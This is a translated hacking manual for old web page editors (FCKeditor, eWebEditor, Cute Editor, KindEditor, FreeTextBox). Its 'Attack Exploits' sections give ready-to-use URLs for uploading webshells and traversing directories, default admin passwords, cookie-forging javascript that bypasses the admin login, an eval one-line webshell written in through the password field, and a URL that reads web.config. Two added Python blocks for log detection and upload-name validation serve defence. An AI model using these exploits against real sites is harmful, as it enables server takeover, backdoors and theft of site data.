Common Web Page Editor Vulnerability Manual (full version): FCKeditor, eWebEditor and other web page editors

FCKeditor

FCKeditor editor page / viewing the editor version / viewing the file upload path

FCKeditor Editor Page

Fckeditor/_samples/default.html

View Editor Version

Fckeditor/_whatsnew.html

View File Upload Path

Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image&currentfolder=/

The url="/xxx" part on the second line of the returned XML is the default upload path.

Note 1: the latest version as of February 15, 2010 is FCKeditor v2.6.6.

Note 2: remember to replace the "asp" in these paths with the scripting language the FCKeditor installation actually uses.

FCKeditor filtering problem caused by its passive (deny-list) restriction strategy

Impact version: FCKeditor x.x <= FCKeditor v2.4.3

Vulnerability Description:

FCKeditor v2.4.3 default denied upload types for the File category: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

FCKeditor 2.0 through 2.2 allows files with the suffixes asa, cer, php2, php4, inc, pwml and pht to be uploaded.

After the upload it saves the file directly with $sFilePath = $sServerDir . $sFileName, instead of rebuilding the name from $sExtension.

On Windows this means that appending a "." to the uploaded file name can get past the check [not tested].

Under Apache the "Apache filename resolution flaw" can also be used; see Appendix A.

It is also recommended that, when the Type variable is defined in the other upload vulnerabilities, the File category be used for uploading, because according to the FCKeditor code it is the least restricted.

Attack Exploits:

Any other suffix is allowed to be uploaded.

Using the Windows 2003 path parsing vulnerability to upload a webshell

Impact Version: Appendix B

Vulnerability Description:

Using the principle of the Windows 2003 path parsing vulnerability, create a directory such as "bin.asp"; files uploaded into that directory are then executed by the script interpreter with the corresponding script permissions.

Attack Exploits:

Fckeditor/editor/filemanager/browser/default/browser.html?Type=image&connector=connectors/asp/connector.asp

FCKeditor PHP arbitrary file upload vulnerability

Impact Version: FCKeditor 2.2 <= FCKeditor 2.4.2

Vulnerability Description:

FCKeditor has an input validation error while processing file uploads; a remote attacker can use this to upload arbitrary files.

When uploading through editor/filemanager/upload/php/upload.php, an attacker can get an arbitrary script uploaded by supplying an invalid value for the Type parameter.

A successful attack requires file uploads to be enabled in the config.php configuration file, which is disabled by default. Exploit: (Please modify the action field for the specified URL):

FCKeditor <=2.4.2 for php.html

Note: to try the v2.2 variant of this vulnerability, Type= can be set to any value, but note that if you change it to media the first letter must be a capital M (Media); otherwise, on Linux, FCKeditor's check of the file directory fails (the check is case sensitive there) and the upload does not succeed.

Custom Type variable arbitrary file upload vulnerability

Impact version: earlier versions

Vulnerability Description:

By supplying a custom value for the Type variable, files can be created or uploaded into the specified directory, with no restriction on the uploaded file format.

Attack exploits: /fckeditor/editor/filemanager/browser/default/browser.html?Type=all&connector=connectors/asp/connector.asp

Opening this address allows any type of file to be uploaded; the default location of the uploaded shell is:

Http://www.heimian.com/UserFiles/all/1.asp

"Type=all" is a custom value: a directory named all is created, and the new directory has no restrictions on the uploaded file format.

Similarly, entering:

/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&connector=connectors/asp/connector.asp

uploads the webshell to the root directory of the website.

Note: if you cannot find the default upload folder, check this file: Fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image&currentfolder=/

FCKeditor news component directory traversal vulnerability

Impact version: the ASPX version of FCKeditor; other versions not tested

Vulnerability description: for how to obtain a webshell, refer to the "custom Type variable arbitrary file upload vulnerability" above.

Attack Exploits:

Modify the CurrentFolder parameter, using ../../ to enter a different directory.

/browser/default/connectors/aspx/connector.aspx?Command=createfolder&type=image&currentfolder=../../..%2f&newfoldername=aspx.asp

Depending on the XML information returned, you can view all the directories in the Web site.

/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image&currentfolder=%2f

Other ways of uploading a webshell in FCKeditor

Impact version: non-optimized (non-compact) versions of FCKeditor

Vulnerability Description:

If the following files are present, opening them allows files to be uploaded.

Attack Exploits:

Fckeditor/editor/filemanager/upload/test.html

Fckeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor file upload: bypassing the renaming of "." to "_" (underscore)

Impact version: FCKeditor >= 2.4.x

Vulnerability Description:

An uploaded file such as shell.php.rar or shell.php;.jpg is renamed (for example to shell_php;.jpg): this is the change in the new FCKeditor.

Attack Exploits:

Submitting "1.php" followed by a space bypasses all of this.

※ However, the trailing space only works on Windows; *nix is not affected ("1.php" and "1.php " are two different files there).

Note: upload/2010/3/201003102334372778.jpg is a file name in the filtered format; what follows relies on the IIS6 parsing vulnerability (Appendix C).

On the first upload, 123.asp;123.jpg is filtered to 123_asp;123.jpg and cannot be run.

But when the same file 123.asp;123.jpg is uploaded a second time, because "123_asp;123.jpg" already exists, the file is named using the numbering scheme 123.asp;123(1).jpg, 123.asp;123(2).jpg, and so on.

So the IIS6 vulnerability can still be exploited.

If the steps above did not succeed in testing, there are several possible reasons:

1. File upload is not enabled in FCKeditor; this feature is off by default when FCKeditor is installed. If you try to upload a file, FCKeditor shows an error.

2. The website uses a compact version of FCKeditor; the compact version has lost many features, including file upload.

3. The flaw has been fixed in this FCKeditor.

--------------------------------------------------------------------------------

eWebEditor

eWebEditor basics

Default backend address: /ewebeditor/admin_login.asp

It is also worth checking whether admin_style.asp can be accessed directly.

Default database path: [Path]/db/ewebeditor.mdb

[Path]/db/db.mdb -- this database path is used in some CMSes

[Path]/db/%23ewebeditor.mdb can also be tried -- a small trick some clever administrators use

Use the default passwords admin/admin888 or admin/admin to enter the backend; admin/123456 can also be tried (some administrators and some CMSes set this).

1. Click "Style Management", then either create a new style or modify an existing one: in the upload types allowed by the image control add types such as |asa, |aaspsp or |cer (any script type the server will execute), click "Submit", then under "Set toolbar" add the "Insert Image" control. Then preview this style, click Insert Image, upload the webshell, and read the path of the uploaded file in "Code" mode.

2. When the administrator has changed the database suffix to asp or asa, you can insert the server side of a one-line webshell into the database and then connect to it with the one-line webshell client to get a webshell.

3. Cannot execute after uploading? Go back to style management and look at the style you edited: the upload path can be customized!

4. Set the upload type but still cannot upload? The file code has probably been changed; try setting the "remote type" and follow the shell method for version 6.0 (see below), which can set the types that are automatically saved from remote files.

5. Cannot add toolbars, but have set a style's file types? Do the following:

(Please modify the Action field)

Action.html

eWebEditor: traces of a previous intrusion

Vulnerability Description:

After downloading the database and looking up the plaintext of the MD5 password, check the eWebEditor_Style (14) style table to see whether a previous intrusion may already have added script upload permissions to a control; if so, construct the address and upload our own webshell.

Attack Exploits:

For example: id=46, s_name=standard1.

Constructed URL: ewebeditor.asp?id=content&style=standard

After changing the id and the style name:

ewebeditor.asp?id=46&style=standard1

eWebEditor directory traversal vulnerability

Vulnerability Description:

Ewebeditor/admin_uploadfile.asp

Admin/upload.asp

Lax filtering results in a directory traversal vulnerability.

Attack Exploits:

The first type: ewebeditor/admin_uploadfile.asp?id=14

Append &dir=... after id=14,

for example &dir=../..

&dir=http://www.heimian.com/../.. shows the entire website's files.

The second type: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./.

eWebEditor 5.2 directory listing vulnerability

Vulnerability Description:

Ewebeditor/asp/browse.asp

Lax filtering results in a directory traversal vulnerability.

Attack Exploits:

http://www.jb51.net/ewebeditor/asp/browse.asp?style=standard650&dir=...././/..
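Detection logic for the FCKeditor browser/connector requests described above (custom Type values, CurrentFolder traversal, script-named folders, leftover test pages) and for the eWebEditor dir= traversal, run over constructed W3C-style access-log lines. This is an added defender-side example, not code from either project or from the original page; the log format, the rule names and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed W3C-style access-log lines (date time method uri-stem uri-query
# status); not real traffic, only input for the rules below. Lines 3-6 carry
# the request shapes this page describes, lines 1, 2 and 7 are ordinary use.
SAMPLE_LOG = """\
2010-03-10 23:34:37 GET /fckeditor/editor/filemanager/browser/default/browser.html Type=Image&Connector=connectors/asp/connector.asp 200
2010-03-10 23:34:38 GET /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 200
2010-03-10 23:35:01 GET /fckeditor/editor/filemanager/browser/default/browser.html Type=all&Connector=connectors/asp/connector.asp 200
2010-03-10 23:35:09 GET /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx Command=CreateFolder&Type=Image&CurrentFolder=../..%2f&NewFolderName=aspx.asp 200
2010-03-10 23:36:12 GET /fckeditor/editor/filemanager/upload/test.html - 200
2010-03-10 23:37:40 GET /ewebeditor/admin_uploadfile.asp id=14&dir=../.. 200
2010-03-10 23:38:02 GET /ewebeditor/ewebeditor.asp id=content&style=standard 200
"""

FCK_PATH = re.compile(r"/fckeditor/editor/filemanager/", re.I)
EWEB_DIR_PATH = re.compile(
    r"/ewebeditor/(admin_uploadfile\.asp|admin/upload\.asp|asp/browse\.asp)$", re.I)
# FCKeditor's built-in resource types; any other Type value was chosen by the client.
BUILTIN_TYPES = {"image", "file", "flash", "media"}
SCRIPT_EXTS = {"asp", "asa", "aspx", "cer", "cdx", "php", "pl", "cgi", "jsp"}

def alerts_for(line):
    """Rule names that fire for one log line ([] means nothing suspicious)."""
    fields = line.split()
    if len(fields) < 6:
        return []
    path, query = fields[3], fields[4]
    # parse_qs URL-decodes values, so "..%2f" is seen as "../".
    params = {} if query == "-" else {
        k.lower(): v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    found = []
    if FCK_PATH.search(path):
        rtype = params.get("type", "")
        if rtype and rtype.lower() not in BUILTIN_TYPES:
            found.append("fck-custom-type")          # Type=all, Type=../
        if ".." in params.get("currentfolder", ""):
            found.append("fck-folder-traversal")     # CurrentFolder=../..
        new_folder = params.get("newfoldername", "")
        if any(s.lower() in SCRIPT_EXTS for s in new_folder.split(".")[1:]):
            found.append("fck-script-named-folder")  # NewFolderName=aspx.asp
        if path.lower().endswith("/test.html"):
            found.append("fck-test-page")            # leftover upload test pages
    if EWEB_DIR_PATH.search(path) and ".." in params.get("dir", ""):
        found.append("eweb-dir-traversal")           # dir=../..
    return found

def scan(log_text):
    """(line number, rule names) for every line that triggered at least one rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        alerts = alerts_for(line)
        if alerts:
            hits.append((number, alerts))
    return hits
```

Ordinary editor use (lines 1, 2 and 7 of the sample) produces no alert; only the four request shapes the page describes are flagged.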

Using the eWebEditor session spoofing vulnerability to enter the backend

Vulnerability Description:

Vulnerability file: admin_private.asp

It only checks the session, not the cookie, and it also has path validation problems.

Attack Exploits:

Create a new test.asp with the following content:

  
Access test.asp, then access any backend file, for example Admin_Default.asp.

eWebEditor ASP version 2.1.6 upload vulnerability

Exploit: (Please modify the action field for the specified URL)

eWebEditor ASP version 2.1.6 upload exploit program.html

eWebEditor 2.7.0 injection vulnerability

Attack Exploits:

http://www.jb51.net/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

Default table name: Ewebeditor_system; default column names: Sys_username, Sys_userpass; then use NBSI to guess the values.

eWebEditor 2.8.0 final version arbitrary file deletion vulnerability

Vulnerability Description:

This vulnerability is in delete.asp in the Example\newssystem directory, an eWebEditor test page that can be accessed directly without logging in.

Exploit: (Please modify the action field for the specified URL)

Del files.html

eWebEditor v6.0.0 upload vulnerability

Attack Exploits:

Click "Insert Image" in the editor, choose "Network", enter the address of your webshell (note: the file name must be of the form xxx.jpg.asp), click OK, then click the "Automatic upload of remote files" control (the first time, you will be prompted to install the control; it takes a moment). Switch to "Code" mode to find the file upload path and access it. The official eWeb demo allows this too, but its upload directory has execute permission removed, so the uploaded webshell cannot run there.

eWebEditor PHP/ASP backend universal bypass vulnerability

Impact version: PHP 3.0 to 3.8; the ASP version 2.8 is also commonly affected, and lower versions may be worth testing too.

Attack Exploits:

Open the backend /ewebeditor/admin/login.php and enter a random user name and password; an error is shown.

Then clear the browser address bar and enter:

javascript:alert(document.cookie="adminuser="+escape("admin"));

javascript:alert(document.cookie="adminpass="+escape("admin"));

javascript:alert(document.cookie="admindj="+escape("1"));

Press Enter after each of the three, clear the address bar again, and now open an ordinary backend file such as .../ewebeditor/admin/default.php; you go straight in.

eWebEditor for PHP arbitrary file upload vulnerability

Impact version: eWebEditor PHP v3.8 or older

Vulnerability Description:

This release saves all style configuration information in the array $aStyle; when register_globals is on in php.ini, we can add our own style and define the upload types.

Attack Exploits:

Phpupload.html

eWebEditor JSP version vulnerabilities

Much the same; I will not say more in this document, because there is no environment to test in and the online dumps are so big that they are not easy to check. Among JSP editors, I think eWeb's share is much smaller than FCKeditor's.

eWebEditor 2.8 Business Edition one-line webshell

Impact version: >= 2.8 Commercial Edition

Attack Exploits:

Log in to the backend, click Modify Password, and set the new password to 1":eval request("H")'

After the change succeeds, access the asp/config.asp file: the one-line webshell has been written into this file.

eWebEditorNet upload.aspx upload vulnerability (eWebEditorNet)

Vulnerability Description:

The main problem with eWebEditorNet is an upload vulnerability in its upload.aspx file.

Attack Exploits:

Default upload address: /ewebeditornet/upload.aspx

A webshell with the .cer extension can be uploaded directly.

If the upload does not work, enter javascript:lbtnUpload.click() in the browser address bar.

After a successful upload, view the source and look for uploadsave to find the save address; by default it is the uploadfile folder.

SouthidcEditor (commonly uses the v2.8.0 eWeb core)

http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb

Http://www.safe5com/admin/southidceditor/admin/admin_login.asp

Http://www.jb51.net/admin/southidceditor/popup.asp

BigcnEditor (eWeb 2.7.5 VIP core)

In fact, the so-called BigcnEditor is the VIP user version of eWebEditor 2.7.5. The reason admin_login.asp is not accessible and shows the four characters "insufficient authority" is probably its authorization ("license") scheme: perhaps only authorized machines are allowed to access the backend.

Perhaps the low-level tricks for eWebEditor v2.8 can be used on it. I have not really tried it myself.

--------------------------------------------------------------------------------

Cute Editor

Cute Editor online editor local file inclusion vulnerability

Impact Version:

CuteEditor for .NET 6.4

Vulnerability Description:

Website file contents can be viewed at will; the harm is considerable.

Attack Exploits:

Http://www.jb51.net/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

--------------------------------------------------------------------------------

WebHtmlEditor

Getting a shell with the Windows 2003 IIS file name parsing vulnerability

Impact version: <= WebHtmlEditor final version 1.7 (no longer updated)

Vulnerability description / exploitation:

Uploaded images and other files are not renamed, so a malicious user can upload diy.asp;.jpg to get around the suffix check. Because of the mistaken assumptions of this kind of editor's author, even where thumbnails or file header checks are present, an image with a one-line webshell inserted can still get through.

--------------------------------------------------------------------------------

KindEditor

Getting a shell with the Windows 2003 IIS file name parsing vulnerability

Impact version: <= KindEditor 3.2.1 (latest edition, released August 2009)

Vulnerability description / exploitation:

Take the official demo as an example: open upload/2010/3/201003102334381513.jpg and everyone can have a look.

Note: see Appendix C for an analysis of the principle.

--------------------------------------------------------------------------------

FreeTextBox

FreeTextBox directory traversal vulnerability

Impact Version: Unknown

Vulnerability Description:

Because the ftb.imagegallery.aspx code only filters the / character and not \, there is a directory traversal problem.

Attack Exploits:

On the editor page, clicking the image button pops up a frame (capture the request to get its address); construct the URL as follows to traverse directories.

Http://www.jb51.net/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..

--------------------------------------------------------------------------------

Appendix A:

Apache filename resolution flaw:

Test environment: Apache 2.0.53 on Windows XP, Apache 2.0.52 on Red Hat Linux

1. A foreign team (SSR) issued an advisory on vulnerabilities related to Apache's MIME module (mod_mime): a file such as attack.php.rar is executed as a PHP file. This includes the Discuz! P11.php.php.php.php.php.php.php.php.php.php.php.php.rar vulnerability.

2. Superhei of S4T wrote about this Apache feature on his blog: Apache checks the suffix from the end and executes according to the last recognized suffix. Just look at the default index.XX files installed in Apache's htdocs and you will understand.

3. Superhei has already explained it very clearly: it can be fully combined with upload vulnerabilities. I tested with the file formats that are commonly permitted for upload, listed below (the classification is rough, don't blame me).

Typical type: rar

Backup type: bak, lock

Streaming media type: wma, wmv, asx, as, mp4, rmvb

Microsoft type: sql, chm, hlp, shtml, asp

Any type: test, fake, ph4nt0m

Special type: torrent

Program type: jsp, c, cpp, pl, cgi

4. The key to the whole issue is what counts as a "recognized suffix" for Apache: whatever is not a "recognized suffix" can be exploited.

5. Test environment:

a.php

  
Then append any suffix and test: a.php.aaa, a.php.aab, ...

by Cloie, in Ph4nt0m.net (c).

Appendix B:

With IIS6 (Windows 2003) installed, the affected file name suffixes include .asp, .asa, .cdx, .cer, .pl, .php and .cgi.

Windows 2003 Enterprise Edition is Microsoft's current mainstream server operating system. IIS6 on Windows 2003 has a file path parsing vulnerability: when a folder is named like hack.asp (that is, the folder name looks like the file name of an ASP file), any type of file inside that folder (.gif, .jpg, .txt and so on) can be executed as an ASP program by IIS. So an attacker can upload a trojan file whose extension (jpg, gif, etc.) makes it look like an image and run it by accessing that file. If any folder on the website has a name ending in .asp, .php, .cer, .asa, .pl and so on, any type of file placed under it may be treated as a script file and executed by the script parser.

Appendix C:

Vulnerability Description:

When the file name is [yyy].asp;[zzz].jpg, Microsoft IIS automatically parses it as ASP.

And when the file name is [yyy].php;[zzz].jpg, Microsoft IIS automatically parses it as PHP.

where [yyy] and [zzz] are arbitrary strings.

Impact Platform:

Windows Server 2000/2003/2003 R2 (IIS 5.x/6.0)

Patching method:

1. Wait for the related Microsoft patch package.

2. Remove script execution permission from the image directory (provided your images are not stored mixed in with program files).

3. Check the code handling every image upload in the site program and intercept file names of the form [yyy].asp;[zzz].jpg.

Note:

Not affected for Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5).
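An upload-side check that covers the bypasses described in Appendices A, B and C and in the FCKeditor "." to "_" section: IIS6 semicolon truncation and the (1), (2) renumbering, script-named folders, Apache multi-suffix names, and Windows trailing dot or space. This is an added defender-side example, not code from FCKeditor, eWebEditor or the original page; the extension lists and the function names are its own assumptions.

```python
import re
from urllib.parse import unquote

# Added defender-side example, not code from FCKeditor or eWebEditor; the
# extension lists are assumptions built from the appendices of this page.
SCRIPT_EXTS = {"asp", "asa", "cdx", "cer", "pl", "php", "cgi", "aspx", "ascx",
               "jsp", "php2", "php3", "php4", "php5", "phtml", "pht", "inc",
               "pwml", "shtml", "shtm", "phtm", "htaccess"}
ALLOWED_EXTS = {"jpg", "jpeg", "gif", "png"}  # allow-list for an image control

def unsafe_name_reasons(filename):
    """Return why a client-supplied file name must be rejected ([] = clean)."""
    reasons = []
    # Windows drops trailing dots and spaces, so "1.php " is stored as "1.php":
    # normalise first and record the attempt.
    name = filename.rstrip(" .")
    if name != filename:
        reasons.append("trailing dot or space")
    # IIS6 stops reading the name at ';', so "x.asp;y.jpg" is served as ASP
    # (Appendix C); the (1), (2) renumbering keeps that prefix intact.
    if ";" in name:
        reasons.append("semicolon truncation")
        name = name.split(";", 1)[0]
    if "/" in name or "\\" in name or ".." in name:
        reasons.append("path separator or '..' in file name")
    # Apache mod_mime reads suffixes from the right until it knows one, so
    # every dotted segment matters, not only the last one (Appendix A).
    segments = [s.lower() for s in name.split(".")[1:]]
    for seg in segments:
        if seg in SCRIPT_EXTS:
            reasons.append("script extension '%s' inside the name" % seg)
            break
    last = segments[-1] if segments else ""
    if last not in ALLOWED_EXTS:
        reasons.append("final extension '%s' not allowed" % last)
    return reasons

def unsafe_folder_reasons(folder):
    """Check a target folder (FCKeditor's CurrentFolder/NewFolderName): a
    component like 'bin.asp' makes IIS6 run everything inside it (Appendix B)."""
    parts = [p for p in re.split(r"[\\/]+", unquote(folder)) if p]
    reasons = []
    if ".." in parts:
        reasons.append("traversal component '..'")
    for p in parts:
        if any(s.lower() in SCRIPT_EXTS for s in p.split(".")[1:]):
            reasons.append("folder component '%s' named like a script" % p)
    return reasons

def storage_name(filename, token):
    """On-disk name: a server-generated token plus the validated extension,
    so nothing the client chose reaches the file system."""
    reasons = unsafe_name_reasons(filename)
    if reasons:
        raise ValueError("rejected %r: %s" % (filename, "; ".join(reasons)))
    return "%s.%s" % (token, filename.rsplit(".", 1)[1].lower())
```

Pair this with the patching advice above: even a name that passes should be stored under a server-generated token, and the upload directory should have script execution removed.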
